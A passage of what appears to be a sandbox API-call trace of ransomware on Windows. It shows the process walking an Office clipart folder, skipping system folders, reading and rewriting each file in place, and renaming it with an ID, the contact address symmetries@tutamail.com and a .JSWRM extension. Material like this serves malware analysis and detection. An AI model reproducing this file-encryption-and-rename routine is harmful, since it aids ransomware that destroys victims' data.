lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0087.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0087.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0087.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0087.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0087.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0087.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.088] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x73a2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0188669.WMF", cAlternateFileName="")) returned 1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2=".") returned 1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="..") returned 1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="...") returned 1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="windows") returned -1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="recovery") returned -1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="perflogs") returned -1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="documents and settings") returned 1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="system volume information") returned -1 [0087.088] lstrcmpiW (lpString1="J0188669.WMF", lpString2="msocache") returned -1 [0087.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188669.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188669.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188669.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188669.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188669.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188669.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.089] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29602) returned 1 [0087.089] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x73a0) returned 0x24d210 [0087.089] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x73a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x73a0, lpOverlapped=0x0) returned 1 [0087.132] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.132] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x73a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x73a0, lpOverlapped=0x0) returned 1 [0087.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.133] CloseHandle (hObject=0x314) returned 1 [0087.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0087.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0087.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0087.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0087.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0087.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.135] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x336a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0188679.WMF", cAlternateFileName="")) returned 1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2=".") returned 1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="..") returned 1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="...") returned 1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="windows") returned -1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="recovery") returned -1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="perflogs") returned -1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="documents and settings") returned 1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="system volume information") returned -1 [0087.135] lstrcmpiW (lpString1="J0188679.WMF", lpString2="msocache") returned -1 [0087.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0087.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188679.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188679.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188679.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0087.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188679.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188679.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188679.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0087.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.136] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13162) returned 1 [0087.136] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3360) returned 0x24d210 [0087.137] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3360, lpOverlapped=0x0) returned 1 [0087.142] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.142] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3360, lpOverlapped=0x0) returned 1 [0087.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.142] CloseHandle (hObject=0x314) returned 1 [0087.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0087.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0087.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0087.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0087.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0087.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.142] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0087.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.143] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ca4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195248.WMF", cAlternateFileName="")) returned 1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2=".") returned 1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="..") returned 1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="...") returned 1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="windows") returned -1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="recovery") returned -1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="perflogs") returned -1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="documents and settings") returned 1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="system volume information") returned -1 [0087.143] lstrcmpiW (lpString1="J0195248.WMF", lpString2="msocache") returned -1 [0087.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0087.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195248.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195248.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195248.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0087.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0087.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195248.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195248.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195248.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0087.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0087.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.145] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7332) returned 1 [0087.145] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ca0) returned 0x205850 [0087.145] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ca0, lpOverlapped=0x0) returned 1 [0087.147] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.147] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ca0, lpOverlapped=0x0) returned 1 [0087.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.147] CloseHandle (hObject=0x314) returned 1 [0087.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0087.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0087.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0087.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0087.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0087.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.148] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0087.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.149] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: 